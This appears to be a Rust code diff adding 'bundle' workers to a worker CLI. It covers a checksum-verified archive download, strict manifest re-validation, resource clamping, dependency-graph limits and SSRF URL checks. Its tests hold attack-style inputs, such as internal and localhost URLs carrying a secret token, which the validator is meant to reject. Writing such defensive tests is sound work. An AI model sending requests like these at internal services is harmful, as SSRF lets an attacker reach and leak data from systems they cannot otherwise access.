+        let err = validate_archive_url_for_ssrf("https://[2001:db8::1]/foo.tar.gz")
+            .expect_err("ipv6 doc rejected");
+        assert!(matches!(err, SsrfError::DisallowedHost { .. }));
+    }
+
+    #[test]
+    fn ssrf_rejects_malformed_url() {
+        let err =
+            validate_archive_url_for_ssrf("not a url at all").expect_err("malformed rejected");
+        assert!(matches!(err, SsrfError::Malformed { .. }));
+    }
+
+    #[test]
+    fn ssrf_error_display_does_not_leak_query() {
+        let err = validate_archive_url_for_ssrf("https://localhost/path?token=supersecret")
+            .expect_err("rejected");
+        let msg = format!("{err}");
+        assert!(
+            !msg.contains("supersecret"),
+            "ssrf error must not include query token: {msg}"
+        );
+    }
+}

--- a/crates/iii-worker/src/cli/local_worker.rs
+++ b/crates/iii-worker/src/cli/local_worker.rs
@@ -170,7 +170,20 @@ pub fn copy_dir_contents(src: &Path, dst: &Path) -> Result<(), String> {
 /// channel itself when the host sets `III_CONTROL_PORT`. That removes
 /// the separate `/opt/iii/supervisor` binary and its install plumbing
 /// that this function used to emit as `exec /opt/iii/supervisor ...`.
-pub fn build_libkrun_local_script(project: &ProjectInfo, prepared: bool) -> String {
+///
+/// `is_bundle` controls dep-directory bind-mount behavior:
+///   * local-path workers (false): bind-mount VM-local dirs over
+///     /workspace/{node_modules,.venv,target,dist,...} so dependency
+///     installs run inside the guest without polluting the host repo.
+///   * bundle workers (true): SKIP the bind-mount block entirely. The
+///     bundle is immutable and ships vendored deps (a bundle's
+///     `dist/index.js` IS the worker; masking it with an empty rootfs
+///     dir breaks the boot).
+pub fn build_libkrun_local_script(
+    project: &ProjectInfo,
+    prepared: bool,
+    is_bundle: bool,
+) -> String {
     let env_exports = build_env_exports(&project.env);
     let mut parts: Vec<String> = Vec::new();
 
@@ -200,8 +213,21 @@ pub fn build_libkrun_local_script(project: &ProjectInfo, prepared: bool) -> Stri
     // so a silent virtiofs failure leaves /workspace existing-but-unmounted.
     // A plain `-d` check would pass and we'd bind-mount deps onto an empty
     // rootfs dir -- writes would leak onto rootfs instead of the host repo.
-    parts.push(
-        r#"if ! { mountpoint -q /workspace 2>/dev/null || awk '$5 == "/workspace" && / - virtiofs /' /proc/self/mountinfo | grep -q .; }; then
+    if is_bundle {
+        parts.push(
+            r#"if ! { mountpoint -q /workspace 2>/dev/null || awk '$5 == "/workspace" && / - virtiofs /' /proc/self/mountinfo | grep -q .; }; then
+  echo "iii: ERROR /workspace is not a virtiofs mountpoint (share missing or mount failed)" >&2
+  echo "--- III_VIRTIOFS_MOUNTS=${III_VIRTIOFS_MOUNTS:-<unset>} ---" >&2
+  cat /proc/self/mountinfo >&2 2>/dev/null || cat /proc/mounts >&2 2>/dev/null || mount >&2
+  exit 1
+fi
+cd /workspace
+echo "iii: workspace ready (bundle worker; dep-dir bind-mounts skipped — vendored deps are shipped in the bundle)" >&2"#
+                .to_string(),
+        );
+    } else {
+        parts.push(
+            r#"if ! { mountpoint -q /workspace 2>/dev/null || awk '$5 == "/workspace" && / - virtiofs /' /proc/self/mountinfo | grep -q .; }; then
   echo "iii: ERROR /workspace is not a virtiofs mountpoint (share missing or mount failed)" >&2
   echo "--- III_VIRTIOFS_MOUNTS=${III_VIRTIOFS_MOUNTS:-<unset>} ---" >&2
   cat /proc/self/mountinfo >&2 2>/dev/null || cat /proc/mounts >&2 2>/dev/null || mount >&2
@@ -220,8 +246,9 @@ for d in node_modules .venv target dist __pycache__ .pytest_cache .next; do
 done
 cd /workspace
 echo "iii: workspace ready; deps mounted VM-local from $DEPS_ROOT" >&2"#
-            .to_string(),
-    );
+                .to_string(),
+        );
+    }
 
     parts.push("echo $$ > /sys/fs/cgroup/worker/cgroup.procs 2>/dev/null || true".to_string());
 
@@ -636,10 +663,69 @@ fn needs_rootfs_clone(managed_dir: &std::path::Path) -> bool {
     !managed_dir.join("bin").exists()
 }
 
-/// Start a local-path worker VM.
+pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16) -> i32 {
+    start_worker_impl(
+        worker_name,
+        worker_path,
+        port,
+        /*disable_watcher=*/ false,
+        /*is_bundle=*/ false,
+    )
+    .await
+}
+
+/// Start a bundle worker VM. Same libkrun rails as
+/// `start_local_worker`, but two bundle-specific behaviors apply:
+///
+/// 1. The host-side source watcher is NOT spawned (bundle is
+///    immutable; nothing to watch).
+/// 2. Resources from `iii.worker.yaml` are clamped against the
+///    bundle resource caps BEFORE libkrun boot. The install-time
+///    clamp (handle_bundle_add) only emits a warning; without this
+///    second clamp at start-time, a manifest declaring 64 CPUs /
+///    1 TiB RAM would still boot a libkrun guest with those values.
+pub async fn start_bundle_worker(worker_name: &str, worker_path: &str, port: u16) -> i32 {
+    // Operator kill switch — same gate as the CLI install path. An
+    // installed bundle worker must not boot while bundle support is
+    // disabled. Checked BEFORE any sandbox/libkrun setup so the engine
+    // logs a clear refusal instead of a deeper-failure error.
+    if super::bundle_download::bundle_workers_disabled() {
+        eprintln!(
+            "{} bundle workers are disabled via {}=1; refusing to start '{}'",
+            "error:".red(),
+            super::bundle_download::ENV_BUNDLE_WORKERS_DISABLED,
+            worker_name,
+        );
+        return 1;
+    }
+    start_worker_impl(
+        worker_name,
+        worker_path,
+        port,
+        /*disable_watcher=*/ true,
+        /*is_bundle=*/ true,
+    )
+    .await
+}
+
+/// Shared body for `start_local_worker` and `start_bundle_worker`.
+///
+/// Three flags differ between callers:
+///   * `disable_watcher` — bundle installs are immutable, so the
+///     host-side source watcher is suppressed.
+///   * `is_bundle` — when true, resources are parsed and clamped via
+///     `bundle_download::parse_bundle_resources` (saturating + capped)
+///     rather than the permissive `parse_manifest_resources`. Local
+///     workers continue to honor whatever the user wrote.
 ///
 /// Re-copies project files, builds env, and runs via libkrun.
-pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16) -> i32 {
+async fn start_worker_impl(
+    worker_name: &str,
+    worker_path: &str,
+    port: u16,
+    disable_watcher: bool,
+    is_bundle: bool,
+) -> i32 {
     // Kill any stale process from a previous engine run
     super::managed::kill_stale_worker(worker_name).await;
 
@@ -653,6 +739,28 @@ pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16)
             "{} Worker path '{}' does not exist or is not a directory",
             "error:".red(),
             worker_path
+        );
+        return 1;
+    }
+
+    // 1a. Bundle workers: re-run the strict manifest validator before
+    // we touch the publisher-controlled YAML via load_project_info. The
+    // install-time validator (handle_bundle_add) already ran, but the
+    // install dir is on the host filesystem — any local-FS-write
+    // attacker (or a future bug that lets a bundle write to its own
+    // install dir) could modify ~/.iii/workers-bundle/{name}/iii.worker.yaml
+    // between install and start to introduce scripts.setup,
+    // scripts.install, or runtime.base_image. The permissive
+    // load_project_info path below would honor those fields. The
+    // strict validator also enforces the 64 KiB manifest cap, which
+    // defuses billion-laughs YAML expansion before serde_yaml sees it.
+    if is_bundle
+        && let Err(e) = super::bundle_download::validate_bundle_manifest(project_path, worker_name)
+    {
+        eprintln!(
+            "{} bundle manifest re-validation failed at start: {}",
+            "error:".red(),
+            e,
         );
         return 1;
     }
@@ -817,7 +925,7 @@ pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16)
     //    `iii-init` binary absorbs that role (see iii_init::supervisor).
     //    Fast-restart is enabled whenever vm_boot wires the control port,
     //    which sets `III_CONTROL_PORT` in the guest env for iii-init.
-    let script = build_libkrun_local_script(&project, is_prepared);
+    let script = build_libkrun_local_script(&project, is_prepared, is_bundle);
 
     let script_path = managed_dir.join("opt").join("iii").join("dev-run.sh");
     std::fs::create_dir_all(managed_dir.join("opt").join("iii")).ok();
@@ -859,7 +967,52 @@ pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16)
 
     // 9. Run via libkrun
     let manifest_path = project_path.join(WORKER_MANIFEST);
-    let (vcpus, ram) = parse_manifest_resources(&manifest_path);
+    let (vcpus, ram) = if is_bundle {
+        // Strict clamp at start-time so a publisher-controlled manifest
+        // can't boot a libkrun guest with attacker-chosen resources.
+        // Install-time clamp (handle_bundle_add) only emits a WARN
+        // event; the actual VM boot still re-reads the manifest from
+        // the install dir, which is exactly what a malicious bundle
+        // counts on.
+        match super::bundle_download::parse_bundle_resources(
+            project_path,
+            super::bundle_download::ResourceCaps::default(),
+        ) {
+            Ok(r) => {
+                if let Some(req) = r.clamped_cpus {
+                    tracing::warn!(
+                        worker = %worker_name,
+                        bundle.requested_cpus = req,
+                        bundle.cpus = r.cpus,
+                        "bundle resources.cpus clamped at start"
+                    );
+                }
+                if let Some(req) = r.clamped_memory_mb {
+                    tracing::warn!(
+                        worker = %worker_name,
+                        bundle.requested_memory_mb = req,
+                        bundle.memory_mb = r.memory_mb,
+                        "bundle resources.memory clamped at start"
+                    );
+                }
+                (r.cpus, r.memory_mb)
+            }
+            Err(e) => {
+                // Manifest was validated at install time. If reading
+                // it fails now, something tampered with the install
+                // dir or the disk is failing. Fall back to safe
+                // defaults rather than booting with raw values.
+                tracing::error!(
+                    worker = %worker_name,
+                    error = %e,
+                    "bundle resource re-clamp failed; using safe defaults"
+                );
+                (2, 2048)
+            }
+        }
+    } else {
+        parse_manifest_resources(&manifest_path)
+    };
 
     let exec_path = "/bin/sh";
     // The script sets up the overlay at /workspace; no pre-cd needed (and
@@ -895,7 +1048,11 @@ pub async fn start_local_worker(worker_name: &str, worker_path: &str, port: u16)
     //
     // Only spawn after the VM was successfully started; otherwise a
     // watcher fire would race into kill_stale_worker against nothing.
-    if exit_code == 0
+    //
+    // Bundle workers (disable_watcher=true) skip this entirely: the
+    // install dir is immutable and there is nothing to watch.
+    if !disable_watcher
+        && exit_code == 0
         && let Err(e) =
             spawn_source_watcher(worker_name, project_path, &managed_dir_for_watcher).await
     {
@@ -1072,7 +1229,7 @@ mod tests {
             env: HashMap::new(),
             base_image: None,
         };
-        let script = build_libkrun_local_script(&project, false);
+        let script = build_libkrun_local_script(&project, false, /*is_bundle=*/ false);
         assert!(script.contains("apt-get install nodejs"));
         assert!(script.contains("npm install"));
         assert!(script.contains("node server.js"));
@@ -1098,7 +1255,7 @@ mod tests {
             env: HashMap::new(),
             base_image: None,
         };
-        let script = build_libkrun_local_script(&project, true);
+        let script = build_libkrun_local_script(&project, true, /*is_bundle=*/ false);
         assert!(!script.contains("apt-get install nodejs"));
         assert!(!script.contains("npm install"));
         assert!(script.contains("node server.js"));

--- a/crates/iii-worker/src/cli/lockfile.rs
+++ b/crates/iii-worker/src/cli/lockfile.rs
@@ -57,6 +57,7 @@ pub enum LockedWorkerType {
     Binary,
     Image,
     Engine,
+    Bundle,
 }
 
 #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
@@ -73,6 +74,10 @@ pub enum LockedSource {
     },
     Image {
         image: String,
+    },
+    Bundle {
+        archive_url: String,
+        sha256: String,
     },
 }
 
@@ -96,6 +101,10 @@ impl<'de> Deserialize<'de> for LockedSource {
             },
             Image {
                 image: String,
+            },
+            Bundle {
+                archive_url: String,
+                sha256: String,
             },
         }
 
@@ -122,6 +131,13 @@ impl<'de> Deserialize<'de> for LockedSource {
                 Ok(LockedSource::Binary { artifacts })
             }
             RawLockedSource::Image { image } => Ok(LockedSource::Image { image }),
+            RawLockedSource::Bundle {
+                archive_url,
+                sha256,
+            } => Ok(LockedSource::Bundle {
+                archive_url,
+                sha256,
+            }),
         }
     }
 }
@@ -349,6 +365,24 @@ impl WorkerLockfile {
                     if !image.contains("@sha256:") {
                         return Err(format!(
                             "{LOCKFILE_NAME} worker {name} image must be pinned by digest"
+                        ));
+                    }
+                }
+                (
+                    LockedWorkerType::Bundle,
+                    Some(LockedSource::Bundle {
+                        archive_url,
+                        sha256,
+                    }),
+                ) => {
+                    if archive_url.trim().is_empty() {
+                        return Err(format!(
+                            "{LOCKFILE_NAME} worker {name} bundle has an empty archive_url"
+                        ));
+                    }
+                    if !is_sha256_hex(sha256) {
+                        return Err(format!(
+                            "{LOCKFILE_NAME} worker {name} bundle has invalid sha256"
                         ));
                     }
                 }

--- a/crates/iii-worker/src/cli/managed.rs
+++ b/crates/iii-worker/src/cli/managed.rs
@@ -30,8 +30,8 @@ use super::builtin_defaults::{get_builtin_default, is_any_builtin, resolve_built
 use super::config_file::ResolvedWorkerType;
 use super::lifecycle::build_container_spec;
 use super::registry::{
-    BinaryWorkerResponse, MANIFEST_PATH, ResolvedWorkerGraph, WorkerInfoResponse,
-    fetch_resolved_worker_graph, fetch_worker_info, parse_worker_input,
+    BinaryWorkerResponse, BundleWorkerResponse, MANIFEST_PATH, ResolvedWorkerGraph,
+    WorkerInfoResponse, fetch_resolved_worker_graph, fetch_worker_info, parse_worker_input,
 };
 use super::worker_manager::state::WorkerDef;
 use std::collections::BTreeMap;
@@ -171,6 +171,183 @@ pub async fn handle_binary_add(
 
         // The engine's file watcher will detect the config change and
         // reload automatically — no need to start the worker here.
+    }
+    0
+}
+
+/// `iii worker add <bundle-name>` handler.
+///
+/// Runs the bundle install pipeline: acquire fslock + staging, stream
+/// archive, verify sha256, extract with bundle-tight limits, validate
+/// strict manifest, atomic install into `~/.iii/workers-bundle/{name}/`,
+/// and write a name-only entry to config.yaml so the resolver
+/// dispatches the worker on the next `iii worker start`.
+pub async fn handle_bundle_add(
+    worker_name: &str,
+    response: &BundleWorkerResponse,
+    brief: bool,
+) -> i32 {
+    // Operator kill switch (III_BUNDLE_WORKERS_DISABLED=1). The
+    // network/filesystem pipeline below downloads publisher-controlled
+    // archives; an operator who doesn't yet trust the registry CDN
+    // must be able to refuse every bundle install without touching
+    // config.yaml. Checked BEFORE any network I/O.
+    if super::bundle_download::bundle_workers_disabled() {
+        eprintln!(
+            "{} bundle workers are disabled via {}=1; refusing to install '{}'",
+            "error:".red(),
+            super::bundle_download::ENV_BUNDLE_WORKERS_DISABLED,
+            worker_name,
+        );
+        return 1;
+    }
+
+    if !brief {
+        eprintln!("  {} Resolved to bundle v{}", "✓".green(), response.version);
+    }
+
+    // 1. Acquire per-worker lock + staging directory.
+    let mut guard = match super::bundle_download::acquire_staging(worker_name).await {
+        Ok(g) => g,
+        Err(e) => {
+            eprintln!("{} {}", "error:".red(), e);
+            return 1;
+        }
+    };
+    let staging_dir = guard.staging_dir().to_path_buf();
+
+    // 2. Stream-download + sha256 verify into staging/.archive.tar.gz.
+    if !brief {
+        eprintln!("  Downloading archive...");
+    }
+    let archive_path = match super::bundle_download::download_archive(
+        &response.archive_url,
+        &response.sha256,
+        &staging_dir,
+    )
+    .await
+    {
+        Ok(p) => p,
+        Err(e) => {
+            eprintln!("{} {}", "error:".red(), e);
+            return 1;
+        }
+    };
+
+    // 3. Extract with bundle-tight limits + entry_type filter.
+    if !brief {
+        eprintln!("  Extracting...");
+    }
+    if let Err(e) = super::bundle_download::extract_bundle_safely(&archive_path, &staging_dir).await
+    {
+        eprintln!("{} {}", "error:".red(), e);
+        return 1;
+    }
+    // Archive blob is no longer needed; drop it so the staging->final
+    // rename doesn't carry it into the install dir. We MUST fail-hard
+    // if the unlink fails (ENOSPC, EBUSY on Windows, EPERM under
+    // hardened mounts): otherwise the next step is `atomic_install`,
+    // which renames `staging_dir` — including the leftover archive —
+    // straight into the worker's install root, where it would persist
+    // forever (a stale 64 MiB blob next to the bundle payload). The
+    // Drop guard on `staging_dir` cleans things up when we return Err
+    // here, so the failure is transactional.
+    if let Err(e) = std::fs::remove_file(&archive_path) {
+        eprintln!(
+            "{} failed to remove staged archive {}: {}",
+            "error:".red(),
+            archive_path.display(),
+            e,
+        );
+        return 1;
+    }
+
+    // 4. Strict manifest validation: rejects scripts.setup, scripts.install,
+    //    runtime.base_image; enforces name match + non-empty scripts.start.
+    if let Err(e) = super::bundle_download::validate_bundle_manifest(&staging_dir, worker_name) {
+        eprintln!("{} {}", "error:".red(), e);
+        return 1;
+    }
+
+    // 5. Resource clamp (engine-level caps not yet plumbed in).
+    let caps = super::bundle_download::ResourceCaps::default();
+    match super::bundle_download::parse_bundle_resources(&staging_dir, caps) {
+        Ok(res) => {
+            if let Some(requested) = res.clamped_cpus {
+                eprintln!(
+                    "  {} resources.cpus clamped from {} to {} (W182 BundleResourceClamped)",
+                    "warning:".yellow(),
+                    requested,
+                    res.cpus,
+                );
+            }
+            if let Some(requested) = res.clamped_memory_mb {
+                eprintln!(
+                    "  {} resources.memory clamped from {} MiB to {} MiB (W182 BundleResourceClamped)",
+                    "warning:".yellow(),
+                    requested,
+                    res.memory_mb,
+                );
+            }
+        }
+        Err(e) => {
+            eprintln!("{} {}", "error:".red(), e);
+            return 1;
+        }
+    }
+
+    // 6. Atomic rename staging → ~/.iii/workers-bundle/{name}/.
+    let final_dir = match super::bundle_download::atomic_install(guard.staging_dir(), worker_name) {
+        Ok(p) => p,
+        Err(e) => {
+            eprintln!("{} {}", "error:".red(), e);
+            return 1;
+        }
+    };
+    guard.commit();
+
+    // 7. Write a name-only worker entry to config.yaml so `iii worker
+    //    list` and `iii worker start` see the worker.
+    //
+    //    We DO NOT write a `worker_path:` field here, even though we
+    //    know the absolute path. resolve_worker_type_from_content
+    //    (config_file.rs) checks worker_path FIRST and would return
+    //    ResolvedWorkerType::Local, which routes subsequent starts
+    //    through start_local_worker WITH the source watcher. By
+    //    writing only the name, the resolver falls through to
+    //    check_install_fallback, which sees the bundle dir +
+    //    iii.worker.yaml at the well-known location and returns
+    //    ResolvedWorkerType::Bundle. Bundle then dispatches to
+    //    start_bundle_worker, which skips the watcher (immutable
+    //    install).
+    if let Err(e) = super::config_file::append_worker(worker_name, None) {
+        eprintln!("{} {}", "error:".red(), e);
+        // Roll back the installed bundle dir so a retry isn't blocked
+        // by `AlreadyExists` from atomic_install. The StagingGuard has
+        // already committed by this point — final_dir is the only
+        // on-disk state we still own. Cleanup errors are logged but
+        // the install still fails (return 1).
+        if let Err(rm_err) = std::fs::remove_dir_all(&final_dir) {
+            eprintln!(
+                "  {} failed to roll back bundle install dir {}: {}",
+                "warning:".yellow(),
+                final_dir.display(),
+                rm_err,
+            );
+        }
+        return 1;
+    }
+
+    if !brief {
+        eprintln!(
+            "\n  {} Worker {} added as bundle (v{}) at {}",
+            "✓".green(),
+            worker_name.bold(),
+            response.version,
+            final_dir.display().to_string().dimmed(),
+        );
+    } else {
+        eprintln!("        {} {}", "✓".green(), worker_name.bold());
     }
     0
 }
@@ -489,6 +666,7 @@ fn skipped_unmanaged_config_workers(
             match super::config_file::resolve_worker_type(name) {
                 ResolvedWorkerType::Local { .. } => Some((name.clone(), "local-path worker")),
                 ResolvedWorkerType::Oci { .. } => Some((name.clone(), "direct OCI worker")),
+                ResolvedWorkerType::Bundle { .. } => Some((name.clone(), "bundle worker")),
                 ResolvedWorkerType::Binary { .. } | ResolvedWorkerType::Config => None,
             }
         })
@@ -572,6 +750,15 @@ async fn prepare_locked_worker(
                 name: name.to_string(),
                 version: worker.version.clone(),
             }))
+        }
+        super::lockfile::LockedSource::Bundle { .. } => {
+            // Bundle lockfile replay lands in T3 alongside the install
+            // pipeline. Until then we surface a clear error so `iii worker
+            // sync` doesn't silently skip bundle workers.
+            Err(format!(
+                "worker `{name}` is a bundle worker; `iii worker sync` replay is not yet implemented. \
+                 Fix: re-install with `iii worker add {name}`."
+            ))
         }
     }
 }
@@ -834,7 +1021,9 @@ fn should_verify_config_worker(lockfile: &super::lockfile::WorkerLockfile, name:
     }
 
     match super::config_file::resolve_worker_type(name) {
-        ResolvedWorkerType::Local { .. } | ResolvedWorkerType::Oci { .. } => false,
+        ResolvedWorkerType::Local { .. }
+        | ResolvedWorkerType::Oci { .. }
+        | ResolvedWorkerType::Bundle { .. } => false,
         ResolvedWorkerType::Binary { .. } | ResolvedWorkerType::Config => true,
     }
 }
@@ -964,6 +1153,21 @@ fn lockfile_from_graph(
                     })?,
                 }),
             ),
+            "bundle" => {
+                let archive_url = node.archive_url.clone().ok_or_else(|| {
+                    format!("resolved bundle worker '{}' has no archive_url", node.name)
+                })?;
+                let sha256 = node.sha256.clone().ok_or_else(|| {
+                    format!("resolved bundle worker '{}' has no sha256", node.name)
+                })?;
+                (
+                    super::lockfile::LockedWorkerType::Bundle,
+                    Some(super::lockfile::LockedSource::Bundle {
+                        archive_url,
+                        sha256,
+                    }),
+                )
+            }
             other => {
                 return Err(format!(
                     "resolved worker '{}' has unsupported type '{}'",
@@ -1145,6 +1349,16 @@ fn populate_manifest_hash_fields(lockfile: &mut super::lockfile::WorkerLockfile)
 }
 
 async fn handle_resolved_graph_add(graph: &ResolvedWorkerGraph, brief: bool) -> i32 {
+    // Enforce client-side dependency-graph bounds BEFORE touching any
+    // filesystem state. A compromised or malformed registry response
+    // must not be able to drive thousands of installs from a single
+    // `iii worker add`. See registry::enforce_dep_graph_bounds
+    // (MAX_DEPENDENCY_DEPTH, MAX_TRANSITIVE_DEPS).
+    if let Err(e) = super::registry::enforce_dep_graph_bounds(graph) {
+        eprintln!("{} {}", "error:".red(), e);
+        return 1;
+    }
+
     for node in &graph.graph {
         if let Err(e) = super::registry::validate_worker_name(&node.name) {
             eprintln!(
@@ -1224,6 +1438,41 @@ async fn handle_resolved_graph_add(graph: &ResolvedWorkerGraph, brief: bool) -> 
                     return 1;
                 };
                 handle_oci_pull_and_add(&node.name, image, brief).await
+            }
+            "bundle" => {
+                // Bundle install via the multi-worker /resolve path.
+                // The graph node carries archive_url + sha256 already
+                // (lockfile_from_graph above also enforces this);
+                // we just need to repackage them into a
+                // `BundleWorkerResponse` for the existing install
+                // pipeline so the legacy GET /download/<name> fallback
+                // and the /resolve fast-path share the same downstream
+                // code.
+                let Some(archive_url) = node.archive_url.clone() else {
+                    eprintln!(
+                        "{} Resolved bundle worker '{}' has no archive_url",
+                        "error:".red(),
+                        node.name,
+                    );
+                    config_snapshot.restore_after_failure();
+                    return 1;
+                };
+                let Some(sha256) = node.sha256.clone() else {
+                    eprintln!(
+                        "{} Resolved bundle worker '{}' has no sha256",
+                        "error:".red(),
+                        node.name,
+                    );
+                    config_snapshot.restore_after_failure();
+                    return 1;
+                };
+                let response = super::registry::BundleWorkerResponse {
+                    name: node.name.clone(),
+                    version: node.version.clone(),
+                    archive_url,
+                    sha256,
+                };
+                handle_bundle_add(&node.name, &response, brief).await
             }
             other => {
                 eprintln!(
@@ -1557,6 +1806,7 @@ pub async fn handle_managed_add(
             }
             handle_oci_pull_and_add(&r.name, &r.image_url, brief).await
         }
+        WorkerInfoResponse::Bundle(r) => handle_bundle_add(&name, &r, brief).await,
         WorkerInfoResponse::Engine(r) => {
             // Engine workers are built into the iii binary; telemetry was already
             // fired by fetch_worker_info via the 204 response path.
@@ -2416,6 +2666,31 @@ pub fn delete_worker_artifacts(worker_name: &str) -> u64 {
         }
     }
 
+    // Bundle worker: ~/.iii/workers-bundle/{name}/. Without this branch,
+    // `iii worker remove foo` and `iii worker clear` would silently leak
+    // the bundle install dir, and `iii worker add foo --force` would
+    // hit `AlreadyExists` from atomic_install.
+    let bundle_dir = super::config_file::bundle_worker_path(worker_name);
+    if bundle_dir.is_dir() {
+        freed += dir_size(&bundle_dir);
+        if let Err(e) = std::fs::remove_dir_all(&bundle_dir) {
+            eprintln!(
+                "  {} Failed to remove {}: {}",
+                "warning:".yellow(),
+                bundle_dir.display(),
+                e
+            );
+        }
+    }
+    // NOTE: do NOT unlink the per-worker fslock file here. The lock
+    // file is tiny (~64 bytes) and can persist forever without harm.
+    // Removing it races with concurrent installers blocked at
+    // `LockFile::open` / `lock_with_pid`: process A unlinks the file,
+    // process C creates a NEW file at the same path and acquires its
+    // lock against a different inode while process B still believes
+    // it holds the original inode's lock. Both B and C then race
+    // through atomic_install.
+
     freed
 }
 
@@ -2781,6 +3056,22 @@ pub async fn handle_managed_start(
                 super::local_worker::start_local_worker(worker_name, &worker_path, port).await,
             )
         }
+        ResolvedWorkerType::Bundle { worker_path } => {
+            // Bundle workers run through the local-worker libkrun rails
+            // via `start_bundle_worker`, which is identical to
+            // `start_local_worker` except the host-side source watcher
+            // is suppressed (immutable install).
+            if config.is_some() {
+                tracing::warn!(
+                    worker = %worker_name,
+                    "--config ignored for bundle workers"
+                );
+            }
+            let path_str = worker_path.to_string_lossy().to_string();
+            StartOutcome::Exit(
+                super::local_worker::start_bundle_worker(worker_name, &path_str, port).await,
+            )
+        }
         ResolvedWorkerType::Binary { binary_path } => {
             StartOutcome::Exit(start_binary_worker(worker_name, &binary_path, config).await)
         }
@@ -2846,6 +3137,21 @@ pub async fn handle_managed_start(
             };
             let rc = start_oci_worker(worker_name, &worker_def, port).await;
             return finish_start(worker_name, rc, wait, port).await;
+        }
+        Ok(WorkerInfoResponse::Bundle(_)) => {
+            // Bundle install during `start` (auto-install fallback) is
+            // not supported. Bundle workers must be installed explicitly
+            // via `iii worker add <name>`, which runs the strict
+            // manifest validator and the SHA-256-verified download
+            // pipeline. Bundle workers are GA so this is purely a UX
+            // guard, not a feature flag.
+            eprintln!(
+                "{} '{}' is a bundle worker. Install it explicitly: `iii worker add {}`",
+                "error:".red(),
+                worker_name,
+                worker_name,
+            );
+            return 1;
         }
         Ok(WorkerInfoResponse::Engine(_)) => {
             if !super::config_file::worker_exists(worker_name) {
@@ -3166,6 +3472,7 @@ fn worker_list_type_label_from_resolved(name: &str, resolved: ResolvedWorkerType
     match resolved {
         ResolvedWorkerType::Local { .. } => "local",
         ResolvedWorkerType::Oci { .. } => "oci",
+        ResolvedWorkerType::Bundle { .. } => "bundle",
         ResolvedWorkerType::Binary { .. } => "binary",
         ResolvedWorkerType::Config if is_any_builtin(name) => "engine",
         ResolvedWorkerType::Config => "config",
@@ -3744,6 +4051,8 @@ mod tests {
             config: serde_json::Value::Null,
             binaries: Some(binaries),
             image: None,
+            archive_url: None,
+            sha256: None,
             dependencies: StdHashMap::new(),
         }
     }
@@ -3761,6 +4070,8 @@ mod tests {
             config: serde_json::Value::Null,
             binaries: None,
             image,
+            archive_url: None,
+            sha256: None,
             dependencies: StdHashMap::new(),
         }
     }
@@ -3774,6 +4085,8 @@ mod tests {
             config: serde_json::Value::Null,
             binaries: None,
             image: None,
+            archive_url: None,
+            sha256: None,
             dependencies: StdHashMap::new(),
         }
     }

--- a/crates/iii-worker/src/cli/mod.rs
+++ b/crates/iii-worker/src/cli/mod.rs
@@ -7,7 +7,9 @@
 pub mod app;
 pub mod binary_download;
 pub mod builtin_defaults;
+pub mod bundle_download;
 pub mod config_file;
+pub mod download;
 pub mod firmware;
 pub mod host_shim;
 pub mod init;

--- a/crates/iii-worker/src/cli/registry.rs
+++ b/crates/iii-worker/src/cli/registry.rs
@@ -50,6 +50,21 @@ pub struct EngineWorkerResponse {
     pub version: String,
 }
 
+/// Bundle workers ship a tar.gz archive of a packaged local-worker
+/// directory. The archive root must contain `iii.worker.yaml`. The
+/// engine downloads, verifies sha256, extracts atomically, and runs
+/// the worker through the existing local-worker rails inside libkrun.
+///
+/// See `cli/bundle_download.rs` for the install pipeline and
+/// `docs/creating-workers/workers-registry.mdx` for publish shape.
+#[derive(Debug, Clone, Deserialize)]
+pub struct BundleWorkerResponse {
+    pub name: String,
+    pub version: String,
+    pub archive_url: String,
+    pub sha256: String,
+}
+
 #[derive(Debug, Deserialize)]
 #[serde(tag = "type")]
 pub enum WorkerInfoResponse {
@@ -59,6 +74,8 @@ pub enum WorkerInfoResponse {
     Oci(OciWorkerResponse),
     #[serde(rename = "engine")]
     Engine(EngineWorkerResponse),
+    #[serde(rename = "bundle")]
+    Bundle(BundleWorkerResponse),
 }
 
 #[derive(Debug, Clone, Deserialize)]
@@ -81,6 +98,16 @@ pub struct ResolvedWorker {
     pub binaries: Option<HashMap<String, BinaryInfo>>,
     #[serde(default)]
     pub image: Option<String>,
+    /// Bundle workers ship a tar.gz archive identified by a URL + sha256.
+    /// `None` for non-bundle worker types. The lockfile path
+    /// (`lockfile_from_graph` in `managed.rs`) requires both to be
+    /// present for `worker_type == "bundle"` and rejects bundle nodes
+    /// missing them so the install path can't silently degrade to an
+    /// unverifiable fetch.
+    #[serde(default)]
+    pub archive_url: Option<String>,
+    #[serde(default)]
+    pub sha256: Option<String>,
     #[serde(default)]
     pub dependencies: HashMap<String, String>,
 }
@@ -102,12 +129,25 @@ pub struct ResolvedRoot {
 
 /// Validates that a worker name is safe for use in filesystem paths and YAML content.
 /// Allowed characters: alphanumeric, dash, underscore, dot. Must not be empty or contain `..`.
+///
+/// Worker names also cannot START with `.`: the bundle install root reserves
+/// `.locks` and `.staging` (under `~/.iii/workers-bundle/`) as internal control
+/// directories. A worker name like `.locks` would shadow them on disk and let
+/// `iii worker remove .locks` -> delete_worker_artifacts wipe every per-worker
+/// fslock system-wide. We blanket-reject leading-dot names so the rule is
+/// stable even as new internal directories are added.
 pub fn validate_worker_name(name: &str) -> Result<(), String> {
     if name.is_empty() {
         return Err("Worker name cannot be empty".into());
     }
     if name.contains("..") {
         return Err(format!("Worker name '{}' contains '..' sequence", name));
+    }
+    if name.starts_with('.') {
+        return Err(format!(
+            "Worker name '{}' cannot start with '.' (reserved for internal control directories)",
+            name
+        ));
     }
     if !name
         .chars()
@@ -243,6 +283,89 @@ pub async fn fetch_resolved_worker_graph(
     };
 
     serde_json::from_str(&body).map_err(|e| format!("Failed to parse worker graph: {}", e))
+}
+
+/// Maximum number of `dependencies:` levels a single `iii worker add`
+/// install graph may traverse. A registry-resolved graph deeper than
+/// this is rejected before any install loop runs. The cap is a
+/// defense-in-depth measure: server-side resolution should already
+/// stop fork-bomb-shaped graphs, but a compromised or malformed
+/// resolver response should never let a client install thousands of
+/// workers from a single `iii worker add`.
+pub const MAX_DEPENDENCY_DEPTH: u32 = 5;
+
+/// Maximum total node count in a resolved install graph (root +
+/// transitives). Pairs with `MAX_DEPENDENCY_DEPTH`: a wide-but-shallow
+/// fan-out should also be refused before the install loop walks it.
